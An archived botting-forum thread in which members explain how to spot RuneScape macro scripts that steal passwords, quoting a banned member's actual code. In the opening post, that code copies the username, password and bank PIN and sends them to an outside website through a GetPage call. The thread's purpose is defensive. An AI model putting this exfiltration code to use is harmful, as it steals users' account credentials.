PDA

View Full Version : How to detect password stealing scripts



Waddo
07-29-2008, 11:19 AM
Recently an SRL Member "IROKI" has found to be password stealing,
(Good Catch BobboHobbo)
So if you have used one of his scripts recently change all your passwords that are the same as your runescape one, if your email is the same it is of great importance that you change this as this can be used to find all your passwords.

Ok so when a script is used to steal passwords it sends the passwords to a website.

There are multiple methods of this

1. Using GetPage

2. Using Plugins (this way is almost undetectable)


1. Using GetPage

This was used recently by Iroki
Procedure DeclarePlayers;

Begin
HowManyPlayers := 1;
NumberOfPlayers(HowManyPlayers);
CurrentPlayer := 0;

Players[0].Name := ''; // Your UserName
Players[0].Pass := ''; // Your PassWord
Players[0].Nick := ''; // Your Nick (3-4 letters from your username)
Players[0].Active := True; // Use this player ??
Players[0].Skill := 'Prayer'; // Skill to lamp
Players[0].Strings[0] := ''; // Your BankPin
Players[0].Strings[1] := 'Adamant'; // What kind of bars you want to smelt ( Bronze, Iron, Silver, Steel, Gold, Mithril, Adamant, Rune, CballsFO, CballsFB )

Code[0] := '';
Code[1] := '';
verKey := '';
End;

There we can see that you enter some your char info and some other info
nothing wrong with that.

However combined with

Begin
If (Code[0] = '') Or (Code[1] = '') Or (verKey = '') Then
Begin
Code[0] := Players[CurrentPlayer].Name;
Code[1] := Players[CurrentPlayer].Pass;
verKey := Players[CurrentPlayer].Strings[0];
End;
For i := 1 To Coding Do
Begin
Code[0] := CodeNow(Code[0]);
Code[1] := CodeNow(Code[1]);
End;
End;

Here we see that the codes and verification key are changed to the account details =O, in all honesty there is nothing wrong with that eithen tho its unnecessary, so if you see this be very suspicious if your still not sure ASK better safe than sorry.

Now the part that should make you worried.

GetPage('http://www.iroki.cba.pl/stats.php?tresc=Code[0]=' + Code[0] + '+Code[1]=' + Code[1] + '+verKey=' + verKey + '+&CreateSessionIDverKey+');


Here they are sending code[0] code[1] and verkey to a website which earlier we learned was changed to your account details.

Get/PostHTTPPage/Ex can also be used instead of GetPage (Thanks Mixster)

If you see this be wary.

Don't use it if it you see this.


Thanks Mixster for stuff below

Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.

Plugin's have the advantage over not asking for permission to access a webpage but are still tracked in the same way of checking every use of username and password as they still have to be input into a procedure/function to send the info into the plugin.

Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.
The only way to be 100% sure a script won't steal your details is to follow the scripts logic and see where it uses your username and password. Every method can be stopped that way.

Daniel
07-29-2008, 11:49 AM
2. Using Plugins (this way is almost undetectable)
Don't give people ideas <_>

BobboHobbo
07-29-2008, 12:30 PM
Credits on who found it pl0x :p

Nah jks. Should be easy to make a script to scan for password thrieft. Ill make one soon :P.

Shuttleu
07-29-2008, 02:33 PM
not that i am planning to make one (which i definatly will not) how to you make it do it through plugins?

if you dont want to tell me then you dont have to

~shut

Waddo
07-29-2008, 03:58 PM
Lol I have no idea I was hoping some one would tell me something about hem so I could add it I'm obviously not going to put how to tho.

I think mixster knows.

randy marsh
07-29-2008, 04:15 PM
maybe all scripts should be vetted before they get posted? or make someone on the forums in charge pf checking scripts?

Waddo
07-29-2008, 04:17 PM
Yes i've thought of that and id be happy to do it but there are alot of scripts released and scripts can be edited pretty easy so it wouldn't work

Zyt3x
07-29-2008, 04:19 PM
hmm... Iroki... Can't remember him :s

anyways, it should be easy to screw his password-stealing-script by just setting Code[0] to ' ', as the internet does not allows spaces (they use %20 as spaces)

Waddo
07-29-2008, 04:26 PM
actually setting it to anything would work as it only changes to acount details if they leave blank =p

Zyt3x
07-29-2008, 04:28 PM
True :D


Quote:
Originally Posted by Waddo
2. Using Plugins (this way is almost undetectable)

Don't give people ideas <_>

Claymore
07-29-2008, 05:28 PM
Rofl! Smart son of a.... Ill keep an eye for them.

insanomano
07-29-2008, 05:36 PM
This is a very good thread cause I heard about Iroki and im sure there is going to be a lot of copycats out there that have no respect for others accounts. Good Job

ShowerThoughts
07-29-2008, 06:43 PM
When mods have to accept script to get them posted, they could also look through for code optimization etc etc

Rich
07-29-2008, 08:01 PM
There are roles of moderators, and admins, so why couldn't we have some people, like said above, check scripts for their code, that could be called 'Script Anaylers' or something along those line. They could have a green name colour, also.

Timer
07-29-2008, 08:03 PM
*makes a plugin!*
*implants it in scars main plugin folder for new scar release*
*h4x every one I hate*

Scaper
07-29-2008, 08:10 PM
i think there should be a script submitence jus like the SRL member application so we can scan scripts befor we give them the go ahead i think that will almost certain to stop em

randy marsh
07-29-2008, 10:38 PM
but then every new version would have to be checked if it got re relaseled!


I uniofficlay make waddo a script checker, as your always on here!

jose89
07-29-2008, 10:46 PM
Please have srl staff review scripts before anyone uses them (more than 2 staffs) Now that one was caught I bet there will be more.

mixster
07-29-2008, 10:49 PM
Checking every script takes ages and is pointless considering there have only been a couple of incidences.
Plugin's only have the advantage over not asking for permission to access a webpage but are still tracked in the same way of checking every use of username and password as they still have to be input into a procedure/function to send the info into the plugin.
Lastly, Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.
The only way to be 100% sure a script won't steal your details is to follow the scripts logic and see where it uses your username and password. Every method can be stopped that way.
Edit:
R0b0t1, the advisor, says: 'No'

MylesMadness
07-29-2008, 10:53 PM
No one every script being searched. How about this, you quit being leechers, learn to script and search it yourself.

Waddo
07-29-2008, 11:22 PM
Myles + everyone else who thinks we should check all the scripts

It takes 20 seconds to edit a script and repost,
If there was a filter then that would mean that when a script was posted it would be held in some storage and could possibly lag up the forums checking each script is a bad idea I would do it if i was asked, i have a lot of free time.

Eithen in the free for all section the admins only check once then you can edit how you please.

MylesMadness
07-29-2008, 11:29 PM
Myles + everyone else who thinks we should check all the scripts

It takes 20 seconds to edit a script and repost,
If there was a filter then that would mean that when a script was posted it would be held in some storage and could possibly lag up the forums checking each script is a bad idea I would do it if i was asked, i have a lot of free time.

Eithen in the free for all section the admins only check once then you can edit how you please.When did I say I supported it?

mixster
07-29-2008, 11:30 PM
Waddo: This has happened only a couple of times and is completely unnecessary. Checking each and every script is the same as the governments of the world deciding that every person should be strip searched before entering every building. If it was a common thing, then I would agree that some form of pre-approval would be needed, but it isn't common at all. It would just waste a lot of time in the long run with minimal results.

Waddo
07-30-2008, 12:26 AM
Mixster that is what im saying Read godarn it read.

checking each script is a bad idea

and Myles i have no idea why i said you :confused: my mistake =p

mixster
07-30-2008, 12:30 AM
You posted earlier saying you would like it though pointed out it wouldn't work, so I thought this was your suggestion to fixing that - mainly because I found it very hard and still do to understand your post and all I could extract from it was your suggestion for a script storage area where it would have to be pre-approved and that you wouldn't mind doing it.

Waddo
07-30-2008, 12:32 AM
I wouldnt mind help doing it if it came to that but it wont as it will do no good especially when people make to or 3 mistakes and re upload in an hour 3 times

Hobbit
07-30-2008, 05:35 AM
Stickied

Waddo
07-30-2008, 11:57 AM
Woah, Thanks Hobbit, Second sticky.

Thanks Mixster for your input.

Ghostman
07-30-2008, 01:33 PM
I'm glad someone posted this, I heard about this guy and how he was stealing passwords.

R0b0t1
08-07-2008, 10:29 PM
When in doubt, it'd be good if you just voiced your concern -- theres no harm done, as its not an outright accusation.

Also, I'd like everyone to note that the stealer only gets about one or two accounts before they're intercepted. Although we can't repay those people, we can at least make sure we discourage account stealing as unprofitable compared to the money you make autoing from using SRL (theres other reasons, but this is the only one account stealers look at).


I'd also like to suggest that we find a way to ban an IP from the SVN, is that possible? I mean, if he tries to come back. He can decide himself if he wants to learn to set up Tor or pay extra for a dynamic IP.

jose89
08-09-2008, 02:08 AM
I just suggest the if you don't know how to read over scripts and see if it is a password scamming script, just use a well-known script (you know like one with lots of progress reports and the thread has lots of pages =p)

isaacxia10
08-09-2008, 04:10 AM
Wow why didn't I figure that out myself.....

R0b0t1
08-09-2008, 04:20 AM
I just suggest the if you don't know how to read over scripts and see if it is a password scamming script, just use a well-known script (you know like one with lots of progress reports and the thread has lots of pages =p)

Thats the problem -- iroki was an SRL member, and his scripts were very good. Too bad he didn't realize how easy it is to track, or how hard it is to transfer items anymore.

lethalpunk
08-09-2008, 10:41 AM
Someone mentioned a script scanner , could someone not make one and if you are un-sure of a script scan it yourself instead of waisting other peoples time ?

atr
08-10-2008, 04:44 AM
Thanks I will start looking through scripts to make sure no one steals my pass.

Magiic
08-10-2008, 09:02 AM
theres no need to scan thouroughly through every script as most scripters oon srl are actually good people and have lives so really its only when idiots like iroki come around we should start worrying and i thought his was the only password stealing script out there whos else is?

I 1337 I
08-16-2008, 09:31 AM
Thanks, my acc was stolen because of PC bot, it worked but really slow (4points in 2hours) :D

blobo23
08-18-2008, 01:23 PM
TY i am new to this and the first script i got had a keylogger in i cant remember whos it was but now i will no :D

Waddo
08-18-2008, 08:11 PM
Erm if it had a keylogger in then you didnt get it from here
unless you downloaded the keylogger script which is a keylogger and nothing else
i dont think there are any harmful keylogger scripts written in scar

happyme
08-19-2008, 05:38 PM
Just wondering, are there any cases where a script could LEGITLY try to get a page?

sf411
08-20-2008, 05:11 AM
Thanks for this man, now I check every script I use! +rep for ya!

mr.peer
08-24-2008, 07:35 PM
I like the script idea.

Smarter Child
08-26-2008, 01:17 AM
why doesn't someone make a program that scans a script and gives it out to the community therefore we can scan it ourslef without making other check it and if someone doesn't scan it then tough luck for them.

Leather Cock~

Waddo
08-26-2008, 01:58 AM
as it is not that easy because there many ways to disgiuse it

CallOfVideos
09-02-2008, 06:34 PM
thanks. it helped alot =)

kensaurus
09-03-2008, 08:54 AM
iroki...
FUCK YOU!

Shuttleu
09-03-2008, 08:59 AM
iroki...
FUCK YOU!
calm down dear :p

iroki may have done the wrong thing but he has been banned and thats the end of him
soo... please dont swear :redface:

~shut

Waddo
09-03-2008, 09:58 AM
if you didnt have 261 post count id say you where trying t get your post count up
but either way stop spamming if you dont have anythink usefull/funny/worthwhile saying dont say it at all

Accure
09-05-2008, 04:26 PM
Thanks.. will look for these items when using scripts

metalguitarfro
09-07-2008, 07:40 AM
Thanks guys. Being new to SCAR, knowing stuff like this from the beginning is very useful.

brad734
09-14-2008, 01:03 AM
ty 4 the tip

cookiedude1
09-21-2008, 07:39 PM
thanks, i think this will definetly help me :)

Waddo
09-21-2008, 11:02 PM
so many ty's yet so little rep nar im jk its good that it helped u

simple skill
09-22-2008, 07:43 PM
i dont think some1 checking would work at all because as you said with plugins its almost undetectable and it would just take people tyoo long to look through all the scripts made

Waddo
09-23-2008, 07:06 AM
its not for that
its basically for sythe there are very few hackers on here because we are trust worthy

rudehead
10-06-2008, 03:08 PM
Omg!! Willow cutter r steelz my password. I'm really new to this, hope it doesn't happen to me.

redda69
10-09-2008, 03:40 PM
Thanks i have no idea about scripts myself i just use them now im going to copy and paste this so i know lol ta

bigk011
10-12-2008, 12:02 AM
ty verymuch for this info:eek: i only auto on my main, so i do need to know how to look out for this

osmm
10-12-2008, 12:48 AM
I don't REALLY post to thank YOU, because I know that no one is really going to do anything new. I mean, no one is ACTUALLY gonig to check scripts for account stealing, people are just to lazy (from what I believe).

BUT! I do thank BH for being so god damn aware! Nice job bro!
Also I hope I did not sound like a bi*ch to you, I do appriciate you telling us about the subject matter, as I was clueless on what account stealing code would look like; but I am just trying to nicely say I highly doubt anyone will check scripts more than they have been before this thread was created.

lowell
10-14-2008, 10:58 AM
great thanks

crunkjmp007
10-16-2008, 05:51 AM
Interesting they would use their time on this, when really its quite sad, thanks for catching it

theo
10-25-2008, 09:51 AM
Well...using plugins...i have no idea about that one but if someone would change like SRL.scar to make it do a certain function when included to a script...that might work.So be careful on that one too...

jondyr
10-25-2008, 11:34 AM
Nice. almost got hacked... thanks ;)

Daniel
10-25-2008, 12:15 PM
Nice. almost got hacked... thanks ;)
Which script almost hacked you? Report it immediately! If no script "almost hacked you", then that post (along with your others) are totally spam, which we here at SRL don't like!

Fsoul
10-26-2008, 01:06 AM
Yay.. my paranoia increases

Ruroken
10-26-2008, 05:51 AM
Yay.. my paranoia increases

In my time at SRL (two years) there have been TWO incidences of pass stealing ;)

imported_night_hawk
10-27-2008, 05:01 PM
exellent find. You save many new people to scar accounts on rs2

lixi
10-29-2008, 11:44 PM
Thanks for the heads up:D

Lorken
10-31-2008, 04:37 AM
thanks!

h1mmelman
10-31-2008, 02:00 PM
thanks for posting this form saved my but :)

GoF
10-31-2008, 02:51 PM
Oh god.. The stupidity... "Tyvm 4 savin mah accuntz!11!! almost got hackd" like wtf there was that one polish guy and mage of begu.. Only pass stealers out there. Spamspamspamspam.

flaminhaz
10-31-2008, 04:59 PM
ii didnt realise that it wouldnt be that obvious anyone could.. actually better not say it, might give people ideas! anyway, thanks for letting us know

suph4l33t
11-01-2008, 11:38 AM
thanks alot, this is exactly what i needed =)
now im gonna feel safer :P

vzlarik
11-03-2008, 06:46 PM
Thanks, didn't know this

triax
11-04-2008, 05:34 PM
Great guide to find some hackers. But it's kinda stupid. Botters shouldn't hack botters...

Bammeh
11-06-2008, 04:05 AM
I've never used an auto-er.
But, I'll be sure to look out for things like this since I am beginning.

mistikman
11-06-2008, 04:11 AM
Stealing people's accounts is lame anyway... What kind of loser wants to steal someon's account?

Ruroken
11-06-2008, 04:58 AM
Just wondering, are there any cases where a script could LEGITLY try to get a page?

Yes, for checking versions (any script) and auths (pay scripts only). Also SRL Stats?


I have infracted a some of the recent, blatant spam. Let this be a lesson to you spammers.

shynie
11-06-2008, 07:17 AM
Yes, for checking versions (any script) and auths (pay scripts only).

About this (offtopic):

Isn't it possible to just remove the auths if you have a script like that or is it obfuscated in some way..?

Ruroken
11-06-2008, 07:19 AM
About this (offtopic):

Isn't it possible to just remove the auths if you have a script like that or is it obfuscated in some way..?

Its obfuscuated or encrypted. Or the author is about to get many copies of his script leaked :p

StrikerX
11-06-2008, 07:27 AM
Hey thanks for the advise, i dont mean to be a nay sayer, but isn't this also teaching people how to make a Password stealing script?

Ruroken
11-06-2008, 07:46 AM
Hey thanks for the advise, i dont mean to be a nay sayer, but isn't this also teaching people how to make a Password stealing script?

Ehh... I GUESS... but anyone who can script should know how to do this. Besides, its a fairly rare occurrence for two reasons:

1) Unknown scripters/members's scripts will be usually looked over to see the quality of the script. As you don't want to trust your accounts to a crap script. This is when they find the pass stealing bit.

2) Its rare that a trusted member will trade their position in SRL for some RS accounts. (This has happened like... 3 times in my 2 years here).

Yoast
11-09-2008, 06:30 PM
Thanks, helped a lot :)

Not that I wouldnt first check the entire script before filling in my pass somewhere, though :P

lolurdead
11-11-2008, 07:26 AM
not sure if ill be able to catch this.. but thx for the tip

bnen
11-17-2008, 07:34 PM
thnaks man

crazyronpoker
11-19-2008, 11:11 PM
thanks for the update, i would have noticed after a while

Ninjew
11-22-2008, 11:50 AM
Thank you! :D
Very much! :D

HarryJames
11-22-2008, 01:14 PM
Would it be bad to send all accounts made (just the name) to a server to see the names? (although same thing could be done with SRLReport)

defnubure
11-26-2008, 05:35 AM
Thank you. Now I will make sure to check the Scripts so i cant get hacked. :D

T0xicblood
11-26-2008, 06:44 PM
I think i kinda get it...

n33d scripts
11-27-2008, 11:17 AM
great now i can see if i get scammed :D

rsman44
11-29-2008, 04:18 PM
Is it possible to delete a part of a script that looks like this?

Romey
11-30-2008, 10:37 AM
Thank you for that info I have been scammed a long time ago.

stuffs
12-05-2008, 09:51 PM
Thanks for this, it's very helpful.

ash1205
12-20-2008, 11:49 PM
i've not used a scar script yet but now when i do atleast i know how to check if its safe :) thanks :)

Goodpeople
01-03-2009, 10:33 PM
Thanks for the help!!
goodpeople

happy man
01-04-2009, 03:54 AM
omg thank you for showing me this i wouldnt of known thanks and good job you guys

only lvl str
01-05-2009, 08:17 PM
Thanks for the info, this should help me keep my password safe. I know what to do now. :D

corn77
01-11-2009, 09:00 PM
Thanks for the information. I had actually seen one of his scripts and contemplated getting it, but then I realized that his account was banned and thus decided not to dolwnload. Appreciate it.

-corn77

H0TSAUCE
01-18-2009, 02:31 PM
Don't give people ideas <_>

Agreed. :eek:

Iroki
01-18-2009, 02:37 PM
Agreed. :eek:

You know that this topic has 8 mounths. Maybe you should post somethink useful??

scar_operater
01-20-2009, 09:12 PM
Thanks for the heads up, never actually knew the these scripts could steal pws.

gamer0n1
01-23-2009, 01:31 AM
thanx a lot for this =D

Cds000
01-23-2009, 06:56 AM
Good...thats soo enoying

FROST-2oo8
01-25-2009, 11:52 AM
Wow Thanks, Im new to the forum and i would've been the perfect target if it weren't for this :)

Theolithical
01-27-2009, 12:21 AM
Thanks a lot for the tip. Being that I'm new to all of this I might hold off from downloading/using any new programs until I am more familiar with the commands.

Baked0420
01-27-2009, 02:48 AM
theolithical: don't worry you don't need to get so paranoid as to not use any scripts, besides we all know you're going to leech at first anyway :p, just playing. But if you are really worried, then just make sure smart, well respected people have posted on the thread, if they don't say anything about the script looking suspicious then you most likely have nothing to worry bout but not always. Just use caution, and also you could just use veyr popular scripts, or scripts from very well trusted people.

norbiux
02-10-2009, 08:25 PM
very helpful thz

PsychicDemon
02-13-2009, 03:32 PM
Its not hard to see if theres a malicious code in scar scripts.
just look for http as u said, before you start it.

But the biggest problem if is someone encrypt the website into unreadable text, some kind of algorithm.
but I don't think there are so many elite haxors on here :D
So I suggest not to look for a guy saying "its clean no virus" on the forums, instead look through it, atleast a little.

And by the way, what anti virus you guys using?
Yes I know anti-virus wont detect scar scripts but I just wanted to know which one is the best, I currently use avast.

reed6273
02-17-2009, 11:25 PM
i tryed a script and it did basically the same thing and then it went to log and and it typed im really bo... witch i figured meant im really bogus ive ran into quite a few of these and i was wondering wat should i do now with my acount?

Da 0wner
02-18-2009, 12:25 AM
Alternatively, you can run this. Account Stealer Checker (http://www.villavu.com/forum/showthread.php?t=41446).

Krisando
02-20-2009, 05:29 AM
Thank's I'll keep it in mind for future use in scripts ;P
*Joking but Im not certain this was a good idea telling people :(*

curran0021
02-22-2009, 02:18 PM
thank you i appreciate you taking your time to protect me.

award982
03-02-2009, 06:39 PM
Just wondering, are there any cases where a script could LEGITLY try to get a page?

yeah,and like should i allow it to access internet?

Da 0wner
03-03-2009, 12:50 AM
Yes, of course. There's many cases.

GE price getting, version checking, etc.

Wanted
03-03-2009, 04:36 AM
This won't work seeing as it's easy to hide code in scripts if you know what you're doing, I did it with RCrB to hide the copyright debug notice, the only way to prevent this is to have a firewall that asks for every program in any instance to allow to not allow it to connect to the internet, in which case you can block/allow/monitor the information being sent or received through any outside connection.

I'm sorry to inform all of you, but this will only prevent you from being screwed from an obvious attempt and will waste a significant amount of time trying to read through code that won't help you necessarily.

Don't get me wrong, it's still a good idea but you should really tell people they are still at risk after doing this unless they have the correct firewall settings, because right now it's like a false positive feeling that you're 100% safe when there are many back doors and methods around this.

Da 0wner
03-03-2009, 06:37 AM
If you are a good coder, looking through the code is really the best option. You should be able to find the malicious code easily and remove it.

Also, why do you advertise RCrB every chance you can get?

staleroflcake
03-08-2009, 08:45 PM
Haha, some people don't feel like learning (like me) but i'll look out for this stuff. Thanks :P

Kaede
03-11-2009, 03:39 AM
I do look through the codes to make sure no one is stealing my pass :)
because I would hate to lose my account :mad:

Dark Arcana
03-11-2009, 07:04 AM
hmmm..I might try this, joke. Thx for the warning :D

Turtle Dude
03-11-2009, 09:43 PM
Thnx Waddo, ill keep an eye out for them.

Mushini
04-22-2009, 06:58 AM
Hey preventing Scar from accessing the internet could also be a preventive measure?
I think it would be a small but useful step, you?

b l o o d007
05-22-2009, 10:35 AM
THX i got one of my accounts hacked. it really sucks cuz i lost all my money!!!!!

Waddo
05-30-2009, 06:53 AM
AMSA no scars internet connection functions are one of the many things that make scar my favourite "Programing language" ...getpage...drools :p

easyas4
07-07-2009, 11:03 AM
http://sythe.org/showthread.php?t=575068
script scanner made by cazax. includes virus scan of the .exe